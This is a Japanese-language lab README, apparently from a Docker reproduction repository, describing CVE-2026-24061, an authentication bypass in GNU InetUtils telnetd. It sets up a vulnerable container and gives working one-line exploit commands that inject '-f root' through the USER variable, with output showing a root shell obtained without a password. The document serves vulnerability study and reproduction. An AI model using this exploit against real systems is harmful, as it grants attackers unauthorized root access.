
GNU InetUtils の GNU telnetd サービスにおける認証バイパス
2026年1月、GNU InetUtils の GNU telnetd サービスが、Kyu Neushwaistein (別名 Carlos Cortes Alvarez) によって認証バイパスに対して脆弱であることが発見されました。CVE-2026-24061 として追跡されているこの欠陥により、攻撃者は有効な認証情報を提供せずに Telnet セッションを確立し、対象システムへの不正アクセスを取得できます。この脆弱性は GNU telnetd サービスのバージョン 2.7-2 まで存在し、まるで90年代からそのまま持ち出されたかのようなものです。
これは引数インジェクションの脆弱性 (CWE-88) であり、CVSS v3.1 スコアは 9.8 (Critical) です。
参照:
ビルドと実行:
docker build -t telnetd-cve-2026-24061 .
docker run --rm -it -p 23:23 telnetd-cve-2026-24061
サービスが起動すると、telnetd はポート 23 で待ち受けます。
この脆弱性により、USER 環境変数に -f フラグを注入することで認証をバイパスできます。telnetd が -f で始まるユーザー名を受け取ると、これを login プログラムに渡し、login プログラムは -f を認証をスキップするフラグとして解釈します。
以下のコマンドを使用してこの脆弱性を悪用し、root アクセスを取得します:
# Linux クライアント (-a オプションが必要)
USER="-f root" telnet -a 127.0.0.1 23
# macOS クライアント (-a オプションは不要)
USER="-f root" telnet 127.0.0.1 23
悪用に成功すると、パスワードを入力せずに root シェルアクセスを取得できます。
$ USER='-f root' telnet -a localhost 23
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Linux 6.14.0-37-generic (4dbc1b976c10) (pts/1)
Linux 4dbc1b976c10 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@4dbc1b976c10:~# id
uid=0(root) gid=0(root) groups=0(root)